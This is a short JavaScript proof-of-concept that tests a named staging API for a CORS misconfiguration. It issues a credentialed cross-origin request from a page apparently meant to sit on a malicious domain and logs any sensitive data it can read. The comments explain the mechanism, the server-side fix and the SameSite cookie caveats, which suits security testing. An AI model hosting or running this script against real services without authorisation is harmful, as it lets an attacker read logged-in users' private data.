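// CORS misconfiguration check. This script would be hosted on your malicious
// domain (e.g., evil.com), i.e. an origin the API has no reason to trust, and
// run in a browser that already holds a session for the API.
//
// How to read the result: a browser only exposes a credentialed cross-origin
// response to script when the server answers with an
// Access-Control-Allow-Origin equal to the requesting origin (not "*") and
// Access-Control-Allow-Credentials: true. If the data below is readable from
// an untrusted origin, the server-side fix is an exact allow-list of trusted
// origins rather than echoing the request's Origin header.
//
// Caveat: in browsers that default cookies to SameSite=Lax, session cookies
// are not attached to this cross-site request unless they are set with
// SameSite=None; Secure. An unauthenticated or error response therefore does
// not by itself show that the CORS policy is safe.
fetch('https://api.stg.inspectorio.com/some/sensitive/endpoint', {
  method: 'GET',
  mode: 'cors',
  // Ask the browser to attach cookies / HTTP auth to the cross-origin request.
  credentials: 'include',
})
  .then((response) => {
    // A 401/403 with a JSON body is readable too, but it is not the protected
    // data. Without this check it would be reported as a success.
    if (!response.ok) {
      throw new Error(
        `Response was readable cross-origin but returned HTTP ${response.status}`,
      );
    }
    return response.json();
  })
  .then((data) => {
    // If the vulnerability exists, you will be able to read the data here.
    console.log('Successfully received sensitive data:', data);
  })
  .catch((error) => {
    // A request blocked by the CORS policy rejects with a TypeError (details
    // are shown only in the browser console). A non-2xx status or a non-JSON
    // body also ends up here.
    console.error('Error:', error);
  });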